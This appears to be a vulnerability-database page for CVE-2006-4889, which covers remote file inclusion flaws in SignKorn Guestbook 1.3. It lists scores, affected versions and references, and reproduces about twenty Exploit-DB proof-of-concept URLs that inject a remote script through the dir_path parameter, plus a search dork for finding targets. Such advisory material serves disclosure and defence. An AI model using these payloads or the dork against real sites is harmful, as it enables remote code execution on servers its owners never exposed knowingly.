CVE-2006-4889
published 2006-09-19CVE-2006-4889: Multiple PHP remote file inclusion vulnerabilities in Telekorn SignKorn Guestbook (SL) 1.3 and earlier, when register_globals is enabled, allow remote…
PriorityP337medium5.1CVSS 2.0
AVNACHAuNCPIPAP
EXPLOIT
EPSS
10.17%
95.1th percentile
Multiple PHP remote file inclusion vulnerabilities in Telekorn SignKorn Guestbook (SL) 1.3 and earlier, when register_globals is enabled, allow remote attackers to execute arbitrary PHP code via a URL in the dir_path parameter in (1) index.php, (2) includes/functions.gb.php, (3) includes/functions.admin.php, (4) includes/admin.inc.php, (5) help.php, (6) smile.php, (7) entry.php; (8) adminhelp0.php, (9) adminhelp1.php, (10) adminhelp2.php, and (11) adminhelp3.php in (a) help/en and (b) help/de directories; and the (12) preview.php, (13) log.php, (14) index.php, (15) config.php, and (16) admin.php in the (c) admin directory, a different set of vectors than CVE-2006-4788.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| telekorn | signkorn_guestbook | <= 1.3 | — |
| telekorn | signkorn_guestbook | — | — |
| telekorn | signkorn_guestbook | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Telekorn Signkorn Guestbook 1.x - '/help/en/adminhelp3.php?dir_path' Remote File Inclusion
exploitdb·2006-09-12
CVE-2006-4889 Telekorn Signkorn Guestbook 1.x - '/help/en/adminhelp3.php?dir_path' Remote File Inclusion
Telekorn Signkorn Guestbook 1.x - '/help/en/adminhelp3.php?dir_path' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/19977/info
Telekorn Signkorn Guestbook is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.
Versions 1.3 and earlier are affected by this issue.
http://www.example.Com/[Script]/help/en/adminhelp3.php?dir_path=[U r Evil Script] ;
Exploit-DB
Telekorn Signkorn Guestbook 1.x - '/admin/config.php?dir_path' Remote File Inclusion
exploitdb·2006-09-12
CVE-2006-4889 Telekorn Signkorn Guestbook 1.x - '/admin/config.php?dir_path' Remote File Inclusion
Telekorn Signkorn Guestbook 1.x - '/admin/config.php?dir_path' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/19977/info
Telekorn Signkorn Guestbook is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.
Versions 1.3 and earlier are affected by this issue.
http://www.example.Com/[Script]/admin/config.php?dir_path=[U r Evil Script] ;
Exploit-DB
Telekorn Signkorn Guestbook 1.x - 'entry.php?dir_path' Remote File Inclusion
exploitdb·2006-09-12
CVE-2006-4889 Telekorn Signkorn Guestbook 1.x - 'entry.php?dir_path' Remote File Inclusion
Telekorn Signkorn Guestbook 1.x - 'entry.php?dir_path' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/19977/info
Telekorn Signkorn Guestbook is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.
Versions 1.3 and earlier are affected by this issue.
http://www.example.Com/[Script]/entry.php?dir_path=[U r Evil Script] ;
Exploit-DB
Telekorn Signkorn Guestbook 1.x - '/admin/admin.php?dir_path' Remote File Inclusion
exploitdb·2006-09-12
CVE-2006-4889 Telekorn Signkorn Guestbook 1.x - '/admin/admin.php?dir_path' Remote File Inclusion
Telekorn Signkorn Guestbook 1.x - '/admin/admin.php?dir_path' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/19977/info
Telekorn Signkorn Guestbook is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.
Versions 1.3 and earlier are affected by this issue.
http://www.example.Com/[Script]/admin/admin.php?dir_path=[U r Evil Script] ;
Exploit-DB
Telekorn Signkorn Guestbook 1.x - '/help/de/adminhelp1.php?dir_path' Remote File Inclusion
exploitdb·2006-09-12
CVE-2006-4889 Telekorn Signkorn Guestbook 1.x - '/help/de/adminhelp1.php?dir_path' Remote File Inclusion
Telekorn Signkorn Guestbook 1.x - '/help/de/adminhelp1.php?dir_path' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/19977/info
Telekorn Signkorn Guestbook is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.
Versions 1.3 and earlier are affected by this issue.
http://www.example.Com/[Script]/help/de/adminhelp1.php?dir_path=[U r Evil Script] ;
Exploit-DB
Telekorn Signkorn Guestbook 1.x - '/help/de/adminhelp2.php?dir_path' Remote File Inclusion
exploitdb·2006-09-12
CVE-2006-4889 Telekorn Signkorn Guestbook 1.x - '/help/de/adminhelp2.php?dir_path' Remote File Inclusion
Telekorn Signkorn Guestbook 1.x - '/help/de/adminhelp2.php?dir_path' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/19977/info
Telekorn Signkorn Guestbook is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.
Versions 1.3 and earlier are affected by this issue.
http://www.example.Com/[Script]/help/de/adminhelp2.php?dir_path=[U r Evil Script] ;
Exploit-DB
Telekorn Signkorn Guestbook 1.x - '/help/en/adminhelp0.php?dir_path' Remote File Inclusion
exploitdb·2006-09-12
CVE-2006-4889 Telekorn Signkorn Guestbook 1.x - '/help/en/adminhelp0.php?dir_path' Remote File Inclusion
Telekorn Signkorn Guestbook 1.x - '/help/en/adminhelp0.php?dir_path' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/19977/info
Telekorn Signkorn Guestbook is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.
Versions 1.3 and earlier are affected by this issue.
http://www.example.Com/[Script]/help/en/adminhelp0.php?dir_path=[U r Evil Script] ;
Exploit-DB
Telekorn Signkorn Guestbook 1.x - 'help.php?dir_path' Remote File Inclusion
exploitdb·2006-09-12
CVE-2006-4889 Telekorn Signkorn Guestbook 1.x - 'help.php?dir_path' Remote File Inclusion
Telekorn Signkorn Guestbook 1.x - 'help.php?dir_path' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/19977/info
Telekorn Signkorn Guestbook is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.
Versions 1.3 and earlier are affected by this issue.
http://www.example.Com/[Script]/help.php?dir_path=[U r Evil Script] ;
Exploit-DB
Telekorn Signkorn Guestbook 1.x - '/admin/log.php?dir_path' Remote File Inclusion
exploitdb·2006-09-12
CVE-2006-4889 Telekorn Signkorn Guestbook 1.x - '/admin/log.php?dir_path' Remote File Inclusion
Telekorn Signkorn Guestbook 1.x - '/admin/log.php?dir_path' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/19977/info
Telekorn Signkorn Guestbook is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.
Versions 1.3 and earlier are affected by this issue.
http://www.example.Com/[Script]/admin/log.php?dir_path=[U r Evil Script] ;
Exploit-DB
Telekorn Signkorn Guestbook 1.x - '/includes/admin.inc.php?dir_path' Remote File Inclusion
exploitdb·2006-09-12
CVE-2006-4889 Telekorn Signkorn Guestbook 1.x - '/includes/admin.inc.php?dir_path' Remote File Inclusion
Telekorn Signkorn Guestbook 1.x - '/includes/admin.inc.php?dir_path' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/19977/info
Telekorn Signkorn Guestbook is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.
Versions 1.3 and earlier are affected by this issue.
http://www.example.Com/[Script]/includes/admin.inc.php?dir_path=[U r Evil Script] ;
Exploit-DB
Telekorn Signkorn Guestbook 1.x - '/admin/index.php?dir_path' Remote File Inclusion
exploitdb·2006-09-12
CVE-2006-4889 Telekorn Signkorn Guestbook 1.x - '/admin/index.php?dir_path' Remote File Inclusion
Telekorn Signkorn Guestbook 1.x - '/admin/index.php?dir_path' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/19977/info
Telekorn Signkorn Guestbook is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.
Versions 1.3 and earlier are affected by this issue.
http://www.example.Com/[Script]/admin/index.php?dir_path=[U r Evil Script] ;
Exploit-DB
Telekorn Signkorn Guestbook 1.x - '/help/de/adminhelp0.php?dir_path' Remote File Inclusion
exploitdb·2006-09-12
CVE-2006-4889 Telekorn Signkorn Guestbook 1.x - '/help/de/adminhelp0.php?dir_path' Remote File Inclusion
Telekorn Signkorn Guestbook 1.x - '/help/de/adminhelp0.php?dir_path' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/19977/info
Telekorn Signkorn Guestbook is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.
Versions 1.3 and earlier are affected by this issue.
http://www.example.Com/[Script]/help/de/adminhelp0.php?dir_path=[U r Evil Script] ;
Exploit-DB
Telekorn Signkorn Guestbook 1.3 - 'dir_path' Remote File Inclusion
exploitdb·2006-09-12
CVE-2006-4889 Telekorn Signkorn Guestbook 1.3 - 'dir_path' Remote File Inclusion
Telekorn Signkorn Guestbook 1.3 - 'dir_path' Remote File Inclusion
---
#==============================================================================================
#Signkorn Guestbook <= v1.3 (dir_path) Remote File Inclusion Exploit
#===============================================================================================
#
#Critical Level : Dangerous
#
#Venedor site : http://warez.gtasoft.ru/skripts/SignKorn.Guestbook.(SL).v1.1.PHP.NULL-DGT.zip
#
#Version : v1.3 & all versions bellow
#
#================================================================================================
#
#Dork : "Signkorn Guestbook 1.3" & "Signkorn Guestbook 1.1 " Signkorn Guestbook 1.2"
#
#================================================================================================
#Bug in : in
Exploit-DB
Telekorn Signkorn Guestbook 1.x - '/help/de/adminhelp3.php?dir_path' Remote File Inclusion
exploitdb·2006-09-12
CVE-2006-4889 Telekorn Signkorn Guestbook 1.x - '/help/de/adminhelp3.php?dir_path' Remote File Inclusion
Telekorn Signkorn Guestbook 1.x - '/help/de/adminhelp3.php?dir_path' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/19977/info
Telekorn Signkorn Guestbook is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.
Versions 1.3 and earlier are affected by this issue.
http://www.example.Com/[Script]/help/de/adminhelp3.php?dir_path=[U r Evil Script] ;
Exploit-DB
Telekorn Signkorn Guestbook 1.x - '/includes/functions.gb.php?dir_path' Remote File Inclusion
exploitdb·2006-09-12
CVE-2006-4889 Telekorn Signkorn Guestbook 1.x - '/includes/functions.gb.php?dir_path' Remote File Inclusion
Telekorn Signkorn Guestbook 1.x - '/includes/functions.gb.php?dir_path' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/19977/info
Telekorn Signkorn Guestbook is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.
Versions 1.3 and earlier are affected by this issue.
http://www.example.Com/[Script]/includes/functions.gb.php?dir_path=[U r Evil Script] ;
Exploit-DB
Telekorn Signkorn Guestbook 1.x - '/admin/preview.php?dir_path' Remote File Inclusion
exploitdb·2006-09-12
CVE-2006-4889 Telekorn Signkorn Guestbook 1.x - '/admin/preview.php?dir_path' Remote File Inclusion
Telekorn Signkorn Guestbook 1.x - '/admin/preview.php?dir_path' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/19977/info
Telekorn Signkorn Guestbook is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.
Versions 1.3 and earlier are affected by this issue.
http://www.example.Com/[Script]/admin/preview.php?dir_path=[U r Evil Script] ;
Exploit-DB
Telekorn Signkorn Guestbook 1.x - 'smile.php?dir_path' Remote File Inclusion
exploitdb·2006-09-12
CVE-2006-4889 Telekorn Signkorn Guestbook 1.x - 'smile.php?dir_path' Remote File Inclusion
Telekorn Signkorn Guestbook 1.x - 'smile.php?dir_path' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/19977/info
Telekorn Signkorn Guestbook is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.
Versions 1.3 and earlier are affected by this issue.
http://www.example.Com/[Script]/smile.php?dir_path=[U r Evil Script] ;
Exploit-DB
Telekorn Signkorn Guestbook 1.x - '/includes/functions.admin.php?dir_path' Remote File Inclusion
exploitdb·2006-09-12
CVE-2006-4889 Telekorn Signkorn Guestbook 1.x - '/includes/functions.admin.php?dir_path' Remote File Inclusion
Telekorn Signkorn Guestbook 1.x - '/includes/functions.admin.php?dir_path' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/19977/info
Telekorn Signkorn Guestbook is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.
Versions 1.3 and earlier are affected by this issue.
http://www.example.Com/[Script]/includes/functions.admin.php?dir_path=[U r Evil Script] ;
Exploit-DB
Telekorn Signkorn Guestbook 1.x - 'index.php?dir_path' Remote File Inclusion
exploitdb·2006-09-12
CVE-2006-4889 Telekorn Signkorn Guestbook 1.x - 'index.php?dir_path' Remote File Inclusion
Telekorn Signkorn Guestbook 1.x - 'index.php?dir_path' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/19977/info
Telekorn Signkorn Guestbook is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.
Versions 1.3 and earlier are affected by this issue.
http://www.example.Com/[Script]/index.php?dir_path=[U r Evil Script] ;
Exploit-DB
Telekorn Signkorn Guestbook 1.x - '/help/en/adminhelp1.php?dir_path' Remote File Inclusion
exploitdb·2006-09-12
CVE-2006-4889 Telekorn Signkorn Guestbook 1.x - '/help/en/adminhelp1.php?dir_path' Remote File Inclusion
Telekorn Signkorn Guestbook 1.x - '/help/en/adminhelp1.php?dir_path' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/19977/info
Telekorn Signkorn Guestbook is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.
Versions 1.3 and earlier are affected by this issue.
http://www.example.Com/[Script]/help/en/adminhelp1.php?dir_path=[U r Evil Script] ;
Exploit-DB
Telekorn Signkorn Guestbook 1.x - '/help/en/adminhelp2.php?dir_path' Remote File Inclusion
exploitdb·2006-09-12
CVE-2006-4889 Telekorn Signkorn Guestbook 1.x - '/help/en/adminhelp2.php?dir_path' Remote File Inclusion
Telekorn Signkorn Guestbook 1.x - '/help/en/adminhelp2.php?dir_path' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/19977/info
Telekorn Signkorn Guestbook is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.
Versions 1.3 and earlier are affected by this issue.
http://www.example.Com/[Script]/help/en/adminhelp2.php?dir_path=[U r Evil Script] ;
No writeups or analysis indexed.
http://securityreason.com/securityalert/1619http://www.osvdb.org/32199http://www.osvdb.org/32200http://www.osvdb.org/32201http://www.osvdb.org/32202http://www.osvdb.org/32203http://www.osvdb.org/32204http://www.osvdb.org/32205http://www.osvdb.org/32206http://www.osvdb.org/32207http://www.osvdb.org/32208http://www.osvdb.org/32209http://www.osvdb.org/32210http://www.osvdb.org/32211http://www.osvdb.org/32212http://www.osvdb.org/32213http://www.osvdb.org/32214http://www.osvdb.org/32215http://www.osvdb.org/32216http://www.osvdb.org/32217http://www.osvdb.org/32218http://www.securityfocus.com/archive/1/446086/100/0/threadedhttp://www.securityfocus.com/bid/19977http://www.telekorn.com/forum/showthread.php?t=1427https://exchange.xforce.ibmcloud.com/vulnerabilities/28888http://securityreason.com/securityalert/1619http://www.osvdb.org/32199http://www.osvdb.org/32200http://www.osvdb.org/32201http://www.osvdb.org/32202http://www.osvdb.org/32203http://www.osvdb.org/32204http://www.osvdb.org/32205http://www.osvdb.org/32206http://www.osvdb.org/32207http://www.osvdb.org/32208http://www.osvdb.org/32209http://www.osvdb.org/32210http://www.osvdb.org/32211http://www.osvdb.org/32212http://www.osvdb.org/32213http://www.osvdb.org/32214http://www.osvdb.org/32215http://www.osvdb.org/32216http://www.osvdb.org/32217http://www.osvdb.org/32218http://www.securityfocus.com/archive/1/446086/100/0/threadedhttp://www.securityfocus.com/bid/19977http://www.telekorn.com/forum/showthread.php?t=1427https://exchange.xforce.ibmcloud.com/vulnerabilities/28888
2006-09-19
Published